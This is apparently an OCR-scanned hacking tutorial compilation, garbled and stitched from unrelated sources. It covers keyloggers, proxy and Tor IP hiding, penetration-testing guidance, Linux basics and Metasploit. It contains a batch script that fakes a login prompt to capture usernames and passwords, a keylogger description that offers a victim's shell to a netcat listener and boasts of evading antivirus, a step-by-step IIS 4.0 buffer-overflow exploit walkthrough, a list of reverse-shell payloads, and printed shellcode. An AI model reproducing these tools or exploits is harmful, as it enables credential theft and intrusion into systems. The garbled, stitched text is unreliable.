An optional add-on is to have a server running a tool like netcat. The Keylogger client library is always attempting to 
connect to a predefined IP address and PORT in order to allow a listening program full access to a shell in the victim's 
computer. Netcat is one of many programs that can be used to listen for the Keylogger library connection attempts. 

Although this proof of concept can be further improved, it provides the full functionality of a basic Keylogger with a few 
nice features. 
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As shown in the results above, antivirus software is completely oblivious to our Keyloggers and fails to detect it. This un- 
detectability can be contributed to the fact that our code and file signatures have not yet been added to the antivirus 
software definitions database. 

How To Create Keyloggers - 

Step By Step - 

( 1 ) 

Step 1 . open your notepad 
Step 2 . now copy below code 

@echo off 
color a 
title Login 

els 

echo Please Enter Email Address And Password 

echo. 

echo. 

cd “C:keylogs” 
set /p user=Username: 
set /p pass=Password: 

echo Username=”%user%” Password=”%pass%” » Log.txt 

start »Program Here« 

exit 


Step 3 . now save it as keylogger.bat 

Step 4. now create a new folder and name it keylogs and put this folder in C drive 
Note:-If the folder is not named as keylogs, then it will not e work 

Step 5 now open your keylogger.bat file, so now your keylogger is ready as shown below 

Note this trick is only for research and ethical purpose.ifyou use this script for any illegal purpose then we are not 
responsible for it. you are responsible for any damage and misuse. 


22. IP Hinding 


Type of Proxy Server - 

"Categorised the proxy server for indirect connection in network ." 

1. Web Based proxy - Are providing the interface for access the network to use restricted network resourse . 


Ex - 1. Kpoxy 

2. Hide my ass 

3. Manual Proxy - 

a) Transprent 

b) Anonymous 

c) Elite 

1 - How To Surf Without IP Address 
Step By Step - 

1. Open Browser And Go to Kproxy.com 

2. Type in Search Option Google.com 

3. My IP is Hide. 

2 - How To Hide My Location On Internet 
Step By Step - 

1. Open Moxila Firefox And Go To Proxy-list.org 

2. And choose PROXY , which country you show on server 



3. Go to moxila firefox + google + tool option 

Or Right button click properties + advanced + network + setting + manual proxy configuration 


4. in http proxy type write your PROXY 

5. and then finale step PORT + OK 

Application Based Proxy - 

As we configure the different proxy server's manualy in our browser there is a many application provide as a proxy 
network and in this network all server are elite type . 

A very popular project in proxy server network is vedilla boundle and its metwork called for tor netwok . 

How To Hide My IP BY Application - 

1. Download TOR Browser 

2. Install it 

3. Open TOR Browser And Open Google.com 


4. Finaly My IP is Hide 



23. Penetration Testing 

Scaning - Is the process of information of gathering ( target maechin ) . 

Address - Is for uniquely identification in network . 

IP Address - 

1. Lan IP Scaner 

2. Web IP Scaner 
Server - 

1. Domain 

2. Static 

Penetration Testing Tool - 

1 . Nmap 

2. Nexus 

Targeted services 

By far the most common service running on port 25 is SMTP(Simple Mail 
Transfer Protocol), which is widely used to transfer electronic mail from one 
network to another; however, there are many trojan services that also abuse this port. 



Description 


Sendmail is the most common application that uses port 25. Sendmail’s purpose is to facilitate the sending and 
receiving of electronic mail from one computer to another . 


History of Sendmail 

Many people have argued that Electronic mail or email is the most useful 

application of the Internet. Sendmail is the underlying application that the majority of networks use to deliver 
mail into and out of their networks. Regardless of what type of email client you may use (Outlook, Outlook 
Express, Eudora etc) the mailyou receive or send will most likely pass though a sendmail host somewherealong 
the way. Sendmail evolved from Eric Allman’s Delivermail program, which used ftp to transfer mail over 
ARPANET (Advanced Research Project Agency network), in response to the then new protocols called TCP/IP 
and SMTP. Sendmail was made available in April of 1983 as part of 4.1c BSD Unix (reference 
http://chris.dci-uk.com/print.php?sid=26). Sendmail was able to set itself apart from the other mail programs of the 
time by being flexible enough to accept incoming mail from different types of systems. Instead of rejecting the 
mail due to ‘incorrect protocols’, it would massage the message into a format it could deal with and pass it on. 
This flexibility came with a cost: complexity. Sendmail is a monolithic program (all functionality is in 1 program), 
and the configuration file can be very cryptic, as you can see from the snip below. 

Snip from a sendmail. cf file: 

######################### 

# Format of headers # 

######################### 

H?P?Return-Path: <$g> 

HReceived: $?sfrom $s $.$?_($?s$|from $.$_) 


$.$?{auth_type}(authenticated$?{auth_ssf} bits=${auth_ssf}$.) 

$.by $j $?r with $r$. id $i$?{tls_version} 

(version=${tls_version} cipher=${cipher} bits=${cipher_bits} verify=${ve 

rify})$.$?u 

for $u; $|; 

$.$b 

H?D?Resent-Date: $a H?D?Date: $a 

H?F?Resent-From: $?x$x <$g>$|$g$. 

FI?F?From: $?x$x <$g>$|$g$. 

FI?x?Full-Name: $x 

# FIPosted-Date: $a 

# FI?l?Received-Date: $b 
FI?M?Resent-Message-ld: <$t.$i@$j> 

FI?M?Message-ld: $t.$i@$i 


Protocol 

Sendmail uses SMTP to transport mail from one computer to another over a computer network. SMTP is the 
protocol developed with the objective of transferring electronic mail reliably and efficiently. 

Terminology 

The following terms are used throughout this document: 

■ Penetration tester, tester, or team: The individual(s) conducting the penetration test for the entity. They 
may be a resource internal or external to the entity. 

■ Application-layer testing: Testing that typically includes websites, web applications, thick clients, or other 
applications. 


■ Network-layer testing: Testing that typically includes external/internal testing of networks (LANS/VLANS), 
between interconnected systems, wireless networks, and social engineering. 

■ White-box testing: Testing performed with knowledge of the internal structure/design/implementation of the 
object being tested. 

■ Grey-box testing: Testing performed with partial knowledge of the internal structure/design/implementation 
of the object being tested. 

■ Black-box testing: Testing performed without prior knowledge of the internal 
structure/design/implementation of the object being tested. 

■ National Vulnerability Database (NVD): The U.S. government repository of standards based vulnerability 
management data. This data enables automation of vulnerability management, security measurement, and 
compliance (e.g., FISMA). 

■ Common Vulnerability Scoring System (CVSS): Provides an open framework for communicating the 
characteristics and impacts of IT vulnerabilities. 


Application-Layer and Network-Layer Testing 

Any software written by or specifically for the organization that is part of the penetration test scope should be 
subject to both an application and network-layer penetration test. This assessment helps identify security 
defects that result from either insecure application design or configuration, or from employing insecure coding 
practices or security defects that may result from insecure implementation, configuration, usage, or maintenance 
of software. 



The remediation of vulnerabilities identified during an application-layer assessment may involve redesigning or 
rewriting insecure code. The remediation of vulnerabilities identified during a network-layer assessment typically 
involves either reconfiguring or updating software. In some instances, remediation may include deploying a 
secure alternative to insecure software. 


Separate Testing Environment 

Because of the nature and the intent of penetration testing, such testing in a production environment during 
normal business hours may impact business operations, and attempts to avoid disruption may increase the 
time, resources and complexity of the testing. This is especially important for high availability systems that may 
be impacted by penetration testing in a production environment. To avoid disruptions and to speed up testing, a 
separate environment that is identical to the production environment may be used for testing instead of the 
production environment. The penetration tester would need to ensure the same application and network-layer 
controls as production exist in the testing environment. This may be accomplished through methods to map out 
the production environment to verify it matches the testing environment. This should be included in the rules of 
engagement. All exploitable vulnerabilities identified during the testing must be corrected on production systems 
and testing repeated to verify that security weaknesses have been addressed. 


Social Engineering 

Social engineering is the attempt to gain information, access, or introduce unauthorized software into the 



environment through the manipulation of end users. PCI DSS v3.0 reconfirms testing by requiring industry 
accepted penetration testing approaches (many of which include social engineering as part of their approach) 
and to have an approach to penetration testing that "considers the threats and vulnerabilities experienced by 
merchants in the last 12 months." This may include social-engineering attacks as a method used for introducing 
malware into the environment. 

Social-engineering tests are an effective method of identifying risks associated with end users' failure to follow 
documented policies and procedures. There is no blanket approach to social-engineering engagements. If an organization 
chooses to include social-engineering testing as part of its annual security review, the tests performed should be 
appropriate for the size and complexity of the organization and should consider the maturity of the organization's security 
awareness program. These tests might include in-person, non-technological interactions such as persuading someone to 
hold open a door, remote interactions such as having someone provide or reset a password, or convincing the end user to 
open a vulnerable e-mail attachment or hyperlink. 


Methodology 

To ensure a successful penetration test, there are several activities and processes to be considered beyond the 
testing itself. This section provides guidance for these activities and is organized by the typical phases that 
occur during a penetration test: pre-engagement, engagement, and post-engagement. 


Scoping 



The organization being assessed is responsible for defining the CDE and any critical systems. It is 
recommended that the organization work with the tester and, where applicable, the assessor to verify that no 
components are overlooked and to determine whether any additional systems should be included in scope. The 
scope of the penetration test should be representative of all access points, critical systems, and segmentation 
methodologies for the CDE. 


Engagement: Penetration Testing 

Each environment has unique aspects/technology that requires the tester select the most appropriate approach 
and the tools necessary to perform the penetration test. It is beyond the scope of this document to define or 
outline which approach, tools, or techniques are appropriate for each penetration test. Instead, the following 
sections provide high-level guidance on considerations for the approach, tools, or techniques. 

Penetration testing is essentially a manual endeavor. In many cases, tools exist that can aid the tester in 
performing the test and alleviate some of the repetitive tasks. Judgment is required in selecting the appropriate 
tools and in identifying attack vectors that typically cannot be identified through automated means. 

Penetration testing should also be performed from a suitable location, with no restrictions on ports or services by 
the Internet provider. For example, a penetration tester utilizing Internet connectivity provided to consumers and 
residences may have SMTP, SNMP, SMB, and other ports restricted by the Internet provider to minimize impact 
by viruses and malware. If testing is performed by a qualified 


internal resource, the test should also be performed from a neutral Internet connection unaffected by access 
controls that might be present from the corporate or support environments. 



Application Layer 


the penetration tester should perform testing from the perspective of the defined roles of the application. The 
organization is strongly encouraged to supply credentials to allow the tester to assume the required roles. This 
will allow the tester to determine if, at any given role, the user could escalate privileges or otherwise gain access 
to data they are not explicitly allowed to access. 

In instances where the organization has created new accounts for the tester to use, it is important that the 
organization ensure all roles and applicable security in the application have been set up to allow the tester to 
effectively test all functionality. 

In instances where a web application utilizes a backend API and the API is in scope, it is recommended that the 
API be tested independently of the web application. 


Network Layer 

Since most protocols are well defined and have standard modes of interaction, network-layer testing is more 
suitable for automated testing. This makes automation the first logical step in a network-layer test. Because of 
such standardization, tools may be used to quickly identify a service, the version of the software, test for 
common misconfigurations, and even identify vulnerabilities. Automated tests can be performed much faster 
than could be expected of a human. However, simply running an automated tool does not satisfy the penetration 
testing requirement. Automated tools cannot interpret vulnerabilities, 



misconfigurations, or even the services exposed to assess the true risk to the environment. The automated tool 
only serves as a baseline indication of the potential attack surface of the environment. The penetration tester 
must interpret the results of any automated tools and determine whether additional testing is needed. 

Using the documentation provided by the organization during the pre-engagement, the tester should: 

■ Verify that only authorized services are exposed at the CDE perimeter. 

■ Attempt to bypass authentication controls from all network segments where authorized users access the 
CDE, as well as segments not authorized to access the CDE. 


High-Level Network Diagram 










Main vulnerabilities identified were: 


■ Man in the middle - It was possible to perform a man-in-the-middle attack using ARP poisoning but the 
tester was not able to extract any sensitive information that could provide information on how to gain access to 
ODIN or THOR. 

■ Weak password policy implemented -Weak password settings on local servers on the BALDER network 
were used to compromise accounts on this network. The tester was not able to use these accounts to gain 
access to ODIN or THOR. As these servers are not in PCI scope, the weak password policy was not considered 
to have an impact on compliance. 

■ Old user accounts were compromised - The tester was able to compromise user accounts that were 
created but had never been in use on the BALDER network. The compromised accounts did not grant access to 
ODIN or THOR 


■ Others - Other vulnerabilities were noted as zone transfer, outdated software, unencrypted protocols used; 
these vulnerabilities were all related to LOKE or BALDER network and did not grant access to ODIN or THOR 
even when exploited. 


Example Store Network Diagram 




Example Corporate Network Diagram 


VPN to stores 



Workstation Workstation Workstation 


Corporate IT Network - 10.15.0.0/24 


INTERNET 


II 


ISP Public IP 
229. x.x. 104 


Firewall 1 


Corporate General Users Network - 10.10.0.0/24 



Workstation Workstation Workstation Workstation Wireless AP 


24. Linux Basic 


Distributions - 

A Linux distribution is a collection of (usually open source) software on top of a Linux kernel. A distribution (or short, 
distro) can bundle server software, system management tools, documentation and many desktop applications in a central 
secure softwarerepository. A distro aims to provide a common look and feel, secure and easy software management and 
often a specific operational purpose. 

Red Hat 

Red Hat is a billion dollar commercial Linux company that puts a lot of effort in developing Linux. They have 



hundreds of Linux specialists and are known for their excellent support. 

They give their products (Red Hat Enterprise Linux and Fedora) away for free. While Red Hat Enterprise Linux(RHEL) 
is well tested before release and supported for up to sevenyears after release, Fedora is a distro with faster updates but 
without support. 

Ubuntu 

Canonical started sending out free compact discs with Ubuntu Linux in 2004 and quickly became popular for home users 
(many switching from Microsoft Windows). Canonical wants Ubuntu to be an easy to use graphical Linux desktop without 
need to ever see a command line. Of course they also want to make a profit by selling support for Ubuntu. 

Debian 

There is no company behind Debian. Instead there are thousands of well organised 

developers that elect a Debian Project Leader every two years. Debian is seen as one of the most stable Linux 
distributions. It is also the basis of every release of Ubuntu. Debian comes in three versions: stable, testing and unstable. 
Every Debian release is named after a character in the movie Toy Story. 

Other 

Distributions like CentOS, Oracle Enterprise Linux and Scientific Linux are based on Red Hat Enterprise Linux and share 
many of the same principles, directories and system administration techniques. Linux Mint, Edubuntu and many other 
*buntu named distributions are based on Ubuntu and thus share a lot with Debian. There are hundreds of other Linux 
distributions. 



GNU General Public License - 


More and more software is being released under the GNU GPL (in 2006 Java was released under the GPL). This license 
(v2 and v3) is the main license endorsed by the Free Software Foundation. It’s main characteristic is the copyleft principle. 
This means that everyone in the chain of consecutive users, in return for the right of use that is assigned, needs to distribute 
the improvements he makes to the software and his derivative works under the same conditions to other users, if he chooses 
to distribute such improvements or derivative works. In other words, software which incorporates GNU GPL software, 
needs to be distributed 

in turn as GNU GPL software (or compatible, see below). It is not possible to incorporate copyright protected parts of GNU 
GPL software in a proprietary licensed work. The GPL has been upheld in court. 


Downloading 

All these screenshots were made in November 2014, which means Debian 8 was still in 'testing' (but in 'freeze', so there 
will be no major changes when it is released). 


Download Debian here: 




Installing Debian 8 

Create a new virtualbox machine (I already have five, you might have zero for now). Click the New button to start a wizard 
that will help you create a virtual machine. 




The machine needs a name, this screenshot shows that I named it server42. 









Create Virtual Machine 


♦ n 


Name and operating system 


Please choose a descriptive name for the new 
virtual machine and select the type of operating 
system you intend to install on it. The name you 
choose will be used throughout VirtualBox to 
identify this machine. 


Name: 

]ype: 

Version: 


| server42| 

| Linux 


jDebian (64 bit) 


“7j jMS 


Hide Description 

< Back | 

Next > 

Cancel 



Most of the defaults in Virtualbox are ok. 


512MB of RAM is enough to practice all the topics in this book. 






We do not care about the virtual disk format. 




Choosing dynamically allocated will save you some disk space (for a small performance hit). 




8GB should be plenty for learning about Linux servers. 




This finishes the wizard. Y ou virtual machine is almost ready to begin the installation. 

First, make sure that you attach the downloaded .iso image to the virtual CD drive, (by opening Settings, Storage followed 
by a mouse click on the round CD icon) 



server42 - Settings 




General 

System 

Display 


W' Storage 


□ 


Storage 


Storage Tree 


Audio 
Network 
Serial Ports 
USB 

Shared Folders 


Controller: IDE 




' © debian-testing-amd64-.. 
a Controller: SATA 
server42.vdi 




Attributes 


Name: | IDE 


]ype: | PIIX4 3 

|7 Use Host I/O Cache 


OK 


Cancel 


Help 


Now boot the virtual machine and begin the actual installation. After a couple of seconds you should see a screen similar to 
this. Choose Install to begin the installation of Debian. 






server42 [Running] - Oracle VM VirtualBox 


_ □ 


rs 


Machine View Devices Help 


debian 


GNU/Linux 



Debian GNU/Linux installer boot menu 


Install 


Graphical ii 


Advanced options 
Help 

Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 


Eg Q & iff i m d [ , ) (o) Left WinKey^ 


First select the language you want to use. 




Choose your country. This information will be used to suggest a download mirror. 



Choose the correct keyboard. On servers this is of no importance since most servers are remotely managed via ssh. 








Enter a hostname (with fqdn to set a dnsdomainname). 
If u want . . . 








Give the root user a password. Remember this password (or use hunter2). 








It is adviced to also create a normal user account. I don't give my full name, Debian 8 accepts an identical username and 
full name paul. 








The use entire disk refers to the virtual disk that you created before in Virtualbox.. 







Again the default is probably what you want. Only change partitioning if you really know what you are doing. 








Accept the partition layout (again only change if you really know what you are doing). 



This is the point of no return, the magical moment where pressing yes will forever erase data on the (virtual) computer. 



Software is downloaded from a mirror repository, preferably choose one that is close by (as in the same country). 







This setup was done in Belgium. 







Leave the proxy field empty (unless you are sure that you are behind a proxy server). 







Choose whether you want to send anonymous statistics to the Debian project (it gathers data about installed packages). You 
can view the statistics here http://popcon.debian.org/. 







Choose what software to install, we do not need any graphical stuff for this training. 



The latest versions are being downloaded. 









Say yes to install the bootloader on the virtual machine. 



Booting for the first time shows the grub screen. 



A couple seconds later you should see a lot of text scrolling of the screen (dmesg). After which you are presented with this 
getty and are allowed your first logon. 







You should now be able to log on to your virtual machine with the root account. Do you remember the password ? Was it 

hunter2 ? 







The screenshots in this book will look like this from now on. You can just type those commands in the terminal (after you 
logged on). 

root@server42 : ~# who am i 
root ttyl 2014-11-10 18:21 
root@server42 : ~# hostname 
server42 

root@server42 : ~# date 

Mon Nov 10 18:21:56 CET 2014 


Command - 


replace and delete - 

x - delete the character below the cursor 
X - delete the character before the cursor 
R - replace the character below the cursor 
P - paste after the cursor (here the last deleted character) 
xp - switch two characters 

undo and repeat - 

u - undo the last action 
. - repeat the last action 

cut, copy and paste a line - 

dd - cut the current line 

yy - (yank yank) copy the current line 



p - paste after the current line 
P - paste before the current line 


join two lines - 

J - join two lines 
yyp - duplicate a line 
ddp - switch two lines 


25. Exploits , Metasploits 


Introduction 

In 2003, a new security tool called the Metasploit Framework (MSF) was released to the public. This tool was the first open- 
source and freely available exploit development framework, and in the year following its release, MSF rapidly grew to be 
one of the security community’s most popular tools. The solid reputation of the framework is due 



to the efforts of the core development team along with external contributors, and their hard work has resulted in over 45 
dependable exploits against many of the most popular operating systems and applications. Released under the GNU GPL 
and artistic license, the Metasploit Framework continues to add new exploits and cutting-edge security features with every 
release. 

We will begin this chapter by discussing how to use the Metasploit Framework as an exploitation platform. The focus of this 
section will be the use of msfconsole, the most powerful and flexible of the three available interfaces. Next, the chapter will 
cover one of the most powerful aspects of Metasploit that tends to be overlooked by most users: its ability to significantly 
reduce the amount of time and background knowledge necessary to develop functional exploits. By working through a real- 
world vulnerability against a popular closed-source Web server, the reader will learn how to use the tools and features of 
MSF to quickly build a reliable buffer overflow attack as a stand-alone exploit.The chapter will also explain how to 
integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit 
module. Details 

as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the 
reader will come to understand the advantages of exploitation frameworks. 

This text is intended neither for beginners nor for experts. Its aim is to detail the usefulness of the Metasploit project tools 
while bridging the gap between exploitation theory and practice. To get the most out of this chapter, one should have an 
understanding of the theory behind buffer overflows as well as some basic programming experience. 


Using the Metasploit Framework 

The Metasploit Framework is written in the Perl scripting language and can be run on almost any UNIX-like platform, 
including the Cygwin environment for Windows. The framework provides the user with three interfaces: msfcli, msfweb, 
and msfconsole. The msfcli interface is useful for scripting because all exploit options are specified as arguments in a single 
command-line statement. The msfweb interface can be accessed via a Web browser and 



serves as an excellent medium for vulnerability demonstrations. The msfconsole interface is an interactive command-line 
shell that is the preferred interface for exploit development. 


The msfconsole Help Menu - 


ca ''-/framework 


Metasploit Franeuork Main Console Help 

? Show the main console help 

cd Change working directory 

exit Exit the console 

help Show the main console help 

info Display detailed exploit or payload information 

quit Exit the console 

reload Reload exploits and payloads 

save Save configuration to disk 

setg Set a global environment variable 

show Show available exploits and payloads 

unsetg Remove a global environment variable 

use Select an exploit by name 

version Show console version 


^LSjxJ 


0 


0 


The msfconsole Exploit Listing - 





Retrieving Exploit Information - 



The Exploit Mode Command List - 


ca ^/framework 


-jnj 

X] 

? 



3 

rtetasploit Framework 

Exploit Console Help 



7 

Show the niain console help 



back 

Drop back to the nain menu 



cd 

Change working directory 


J 

check 

Perform vulnerability check 


exit 

Exit the console 


exploit 

Launch the actual exploit 



be lp 

Show the main console help 



info 

Display detailed exploit or payload information 



quit 

Exit the console 



re load 

Reload exploits and payloads 



rexplo it 

Reload and exploit, for us tester types 



save 

Save configuration to disk 



set 

Set a temporary environment variable 



setg 

Set a global environment variable 



show 

Show options, advanced, payloads, or targets 



unset 

Remove a temporary environment variable 



unsetg 

Remove a global environment variable 



use 

Select an exploit by name 



vers ion 

Show console version 



msf iis40 htr > 







Setting Exploit Options - 


Advanced Options - 


c\ ^/framework 


nsf iis40_litr > show advanced 
Exploit Options 

Exploit <Msf : : Exploit : : iis40_htr> : 


nsf iis40 _htr > _ 


-Ini x| 

3 


zl 


Setting the Payload - 


ca ^ /framework 


^lnjxj 


nsf iis40_htr<uin32_bind> > show payloads 
Metasploit Framework Usable Payloads 




win32_bind 

win32_bind_dllin ject 

uin32_bind_meterpreter 

uin32_bind_stg 

uin32_bind_stg_upexec 

win32_bind_wnc in ject 

win32_exec 

uin32_re verse 

win32_reverse_dllin ject 

win32_reverse_neterpreter 

win32_reverse_stg 

uin32_reverse_stg_upexec 

win32_reverse_vncin ject 


W in do ws 
U in do ws 
U in do ws 
U in do ws 
U in do ws 
U in do us 
U in do us 
U in do us 
W in do us 
W in do us 
U in do us 
U in do us 
W in do us 


Bind Shell 

Bind DLL Inject 

Bind Interpreter DLL Inject 

Staged Bind Shell 

Staged Bind Upload/Execute 

Bind UNC Server DLL Inject 

Execute Connand 

Reverse Shell 

Reverse DLL Inject 

Reverse interpreter DLL Inject 

Staged Reverse Shell 

Staged Reverse Upload/Execute 

Reverse UNC Server Inject 


nsf iis40_htr<uin32_bind> > set PAYLOftD uin32_bind 
PftYLORD -> uin32_bind 

nsf iis40 htr<uin32 bind) > 


J 


▼ 



Additional Payload Options - 


v ^/framework 




^lnjxj 

ip . . | , 


show options 



3 

Exploit and 

Payload Options 




Exploit : 

Name 

Default 

Descript ion 



opt ional 
required 
required 

SSL 

RHOST 

RPORT 

192.168.119.136 

80 

Use SSL 

The target address 

The target port 



Payload: 

Name 

Default Description 



required 

required 

EXITFUNC 

LPORT 

seh Exit technique: "process", "thread", 

4444 Listening port for bind shell 

"seh" 


Target: Windows NT4 

SP5 




ic i- 40 


- 



zl 


Writing Exploits - 

The ability to dynamically handle payload connections is yet another unique 

Metasploit feature. Traditionally, an external program like Netcat must be used to connect to the listening port after the 
exploit has been triggered. If the payload were to create a VNC server on the remote machine, then an external VNC client 
would be needed to connect to the target machine. However, the framework removes the needs for outside payload 
handlers. In the previous example, a connection is automatically initiated to the listener on port 4444 of the remote machine 
after the exploit succeeds. This payload handling feature extends to all payloads provided by Metasploit, including advanced 
shellcode like VNC inject. 


Exploit Development with Metasploit - 



In this section, we will develop a stand-alone exploit for the same vulnerability that was exploited in the previous example. 
Normally, writing an exploit requires an in-depth understanding of the target architecture’s assembly language, detailed 
knowledge of the operating system’s internal structures, and considerable programming skill. 

Using the utilities provided by Metasploit, this process is greatly simplified.The 

Metasploit project abstracts many of these details into a collection of simple, easy-to-use tools. These tools can be used to 
significantly speed up the exploit development timeline and reduce the amount of knowledge necessary to write functional 
exploit code. In the process of re-creating the IIS 4.0 HTR Buffer Overflow, we will explore the use of these 

utilities. The following sections cover the exploit development process of a simple stack overflow from start to finish. First, 
the attack vector of the vulnerability is deter mi ned. 

Second, the offset of the overflow vulnerability must be calculated. After deciding on the most reliable control vector, a 
valid return address must be found. Character and size limitations will need to be resolved before selecting a payload. A 
nop sled must be created. Finally, the payload must be selected, generated, and encoded. 

Assume that in the follow exploit development that the target host runs the 

Microsoft Internet Information Server (IIS) 4.0 Web server on Windows NT4 Service Pack 5, and the system architecture is 
based around a 32-bit x86 processor. 


Determining the Attack Vector - 

An attack vector is the means by which an attacker gains access to a system to deliver a specially crafted payload.This 
payload can contain arbitrary code that gets executed on the targeted system. 

The first step in writing an exploit is to determine the specific attack vector against 

the target host. Because Microsoft’s IIS Web server is a closed-source application, we must rely on security advisories and 
attempt to gather as much information as possible. 


Internet Information Server (IIS) 4.0 that was first reported by eEye in 

www.eeye.com/html/research/advisories/AD19990608.html.The eEye advisory explains that an overflow occurs 



when a page with an extremely long filename and an .htr file extension is requested from the server. When IIS receives a 
file request, it passes the filename to the ISM dynamically linked library (DLL) for processing. 

Because neither the IIS server nor the ISM DLL performs bounds checking on the length of the filename, it is possible to 
send a filename long enough to overflow a buffer in a vulnerable function and overwrite the return address. By hijacking 
the flow of execution in the ISM DLL and subsequently the inetinfo.exe process, the attacker can direct the system to 
execute the payload. Armed with the details of how to trigger the overflow, we must determine how to send a long filename 
to the IIS server. A standard request for a Web page consists of a GET or POST directive, the path and filename of the page 
being requested, and HTTP protocol information. The request is terminated with two newline and carriage return 
combinations (ASCII characters 0x10 and 0x13, respectively). The following example shows a GET request for the 
index.html page using the HTTP 1.0 protocol. 

GET /index.html HTTP/ 1 . 0 \r \n\r \n 

According to the advisory, the filename must be extremely long and possess the htr 
file extension.The following is an idea of what the attack request would look like: 

GET / extremelylargestr ingof character sthatgoesonandon . htr HTTP/ 1.0\r\n\r\n 

Although the preceding request is too short to trigger the overflow, it serves as an 
excellent template of our attack vector. In the next section, we determine the exact 
length needed to overwrite the return address. 


Listing Available Payloads - 



ca ^/framework 


^JxJ 


Adnin ist ratorPnot hingbut fat 

$ ./msf payload -h 



Usage: ./rosf payload <payload> 

Payloads : 

bsd_ia32_bind 

bsd_ia32_bind_stg 

bsd_ia32_exec 

bsd_ia32_f indrecv 

bsd_ia32_f indrecv_stg 

bsd_ia32_f indsock 

bsd_ia32_re verse 

bsd_ia32_reverse_stg 

bsd_sparc_bind 

bsd_sparc_reuerse 

bsdi_ia32_bind 

bsdi_ia32_bind_stg 

bsdi_ia32_f indsock 

bsdi_ia32_re verse 

bsdi_ia32_reverse_stg 

cnd_generic 

cnd_irix_bind 

cnd_sol_bind 

cnd_un ix_reverse 

cnd_un ix_reverse_bash 

c nd_un ix_r e v e rs e _c r o s s 

cnd_un ix_reverse_nss 

generic_sparc_execve 

irix_mips_execve 

linux_ia32_addusei* 

linux_ia32_bind 

linux_ia32_bind_stg 

linux_ia32_exec 

linux_ia32^F indrecv 

linux_ia32_f indrec v_stg 

1 in ux_ia3 2 _f in ds o c k 

linux_ia32_re verse 

linux_ia32_reverse_impurity 

linux_ia32_reverse_stg 

linux_ia32_re verse _udp 

1 in ux_s par c _b in d 

linux_sparc_re verse 

osx_ppc_bind 

osx_ppc_bind_stg 

osx_ppc_f indrecv_peek_stg 

osx_ppc_f indrec v_stg 

osx_ppc_re verse 

osx_ppc_reverse_nf _stg 

osx_ppc_reverse_stg 

solar is _ia32_bind 

so lar is _ia32_f indsock 

solar is _ia32_re verse 

solaris_sparc_bind 

so lar is _s pare _re verse 

win32_adduser 

win32_bind 

win32_bind_dllin ject 

win32_bind_meterpreter 

win32_bind_stg 

win32_bind_stg_upexec 


[var=val ] <S!C!P!R> 


BSD 1 032 Bind Shell 

BSD IA32 Staged Bind Shell 

BSD ID32 Execute Connand 

BSD ID32 Recv Tag Findsock Shell 

BSD IR32 Staged Findsock Shell 

BSD IA32 SrcPort Findsock Shell 

BSD IA32 Reverse Shell 

BSD IA32 Staged Reverse Shell 

BSD SPARC Bind Shell 

BSD SPARC Reverse Shell 

BSDi I A32 Bind Shell 

BSDi IA32 Staged Bind Shell 

BSDi IA32 SrcPort Findsock Shell 

BSDi IA32 Reverse Shell 

BSDi IA32 Staged Reverse Shell 

Arbitrary Connand 

IRIX Inetd Bind Shell 

Solaris Inetd Bind Shell 

Unix Telnet Piping Reverse Shell 

Unix /dev/tep Piping Reverse Shell 

Unix Telnet Piping Reverse Shell 

Unix Spaceless Telnet Piping Reverse Shell 

BSD/Linux/Solaris SPARC Execute Shell 

IRIX MIPS Execute Shell 

Linux IA32 Add User 

Linux IA32 Bind Shell 

Linux IA32 Staged Bind Shell 

Linux IA32 Execute Connand 

Linux IA32 Recv Tag Findsock Shell 

Linux IA32 Staged Findsock Shell 

Linux IA32 SrcPort Findsock Shell 

Linux IA32 Reverse Shell 

Linux IA32 Reverse Inpurity Upload/Execute 

Linux IA32 Staged Reverse Shell 

Linux IA32 Reverse UDP Shell 

Linux SPARC Bind Shell 

Linux SPARC Reverse Shell 

Mac OS X PPC Bind Shell 

Mac OS X PPC Staged Bind Shell 

Mac OS X PPC Staged Find Recv Peek Shell 

Mac OS X PPC Staged Find Recv Shell 

Mac OS X PPC Reverse Shell 

Mac OS X PPC Staged Reverse Null-Free Shell 

Mac OS X PPC Staged Reverse Shell 

Solaris IA32 Bind Shell 

Solaris IA32 SrcPort Findsock Shell 

Solaris IA32 Reverse Shell 

Solaris SPARC Bind Shell 

Solaris SPARC Reverse Shell 

Windows Execute net user /ADD 

Windows Bind Shell 

Windows Bind DLL Inject 

Windows Bind Meterpreter DLL Inject 

Windows Staged Bind Shell 

Windows Staged Bind Upload/Execute 

II* 1 n ■ X 1 1 LI St O I\T ¥ ¥ * 



Generating the Payload - 



e\ ^/framework 


Admin ist rat orPnothingbutf at ~/f raneitoi'k 

$ ./msf pay load uin32_bind LPORT =31337 C 

"Sxf cSx6aSxebSx4f Sxe8Sxf 9Sxf f \xf f Sxf f Sx60Sx8bSx6cSx24Sx24Sx8bSx45 " 
"Sx3cSx8bSx7cSx05Sx?8Sx01Sxef Sx8bSx4f Sxl8Sx8bSx5f Sx20Sx01SxebSxe3" 
"Sx30Sx49Sx8bSx34Sx8bSx01SxeeSx31Sxc0Sx99SxacSx84Sxc0Sx74Sx07Sxcl" 
"Sxc aSx0dSx01 \xc2\xe bSxf 4Sx3 b\x54\x2 4Sx28 Sx75 Sxe 3 \x8 b\x5f \x2 4Sx01 ' ’ 
' \xe b\x66\x8b\x0c\x4b\x8b\x5f Sxl c Sx01 Sxe b\x03 Sx2 c Sx8 b\x8 9 Sx6 c Sx2 4 ' ’ 
"SxlcSx61Sxc3Sx31Sxc0Sx64Sx8bSx40Sx30Sx8bSx40Sx0cSx8bSx?0SxlcSxad" 
"Sx8bSx40Sx08Sx5eSx68Sx8eSx4eSx0eSxecSx50Sxf f Sxd6Sx31SxdbSx66Sx53" 
"Sx6 6 Sx6 8 Sx3 3 Sx3 2 Sx6 8 Sx77Sx73 Sx3 2 Sx5 f Sx5 4Sxf f Sxd0Sx6 8 Sxc bSxe dSxf c ” 
"Sx3bSx50Sxf f Sxd6Sx5f Sx89Sxe5Sx66Sx81SxedSx08Sx02Sx55Sx6aSx02Sxf f ” 
”Sxd0Sx68Sxd9Sx09Sxf 5SxadSx5?Sxf f Sxd6Sx53Sx53Sx53Sx53Sx53Sx43Sx53" 
' ’\x43 Sx5 3 Sxf f \xd0Sx6 6 Sx68Sx7aSx69 Sx6 6 Sx5 3 Sx8 9 Sxe 1 \x9 5 Sx6 8 \xa4\xl a' ’ 
"Sx70Sxc7Sx57Sxf f Sxd6Sx6aSxl0Sx51Sx55Sxf f Sxd0Sx68Sxa4SxadSx2eSxe9" 
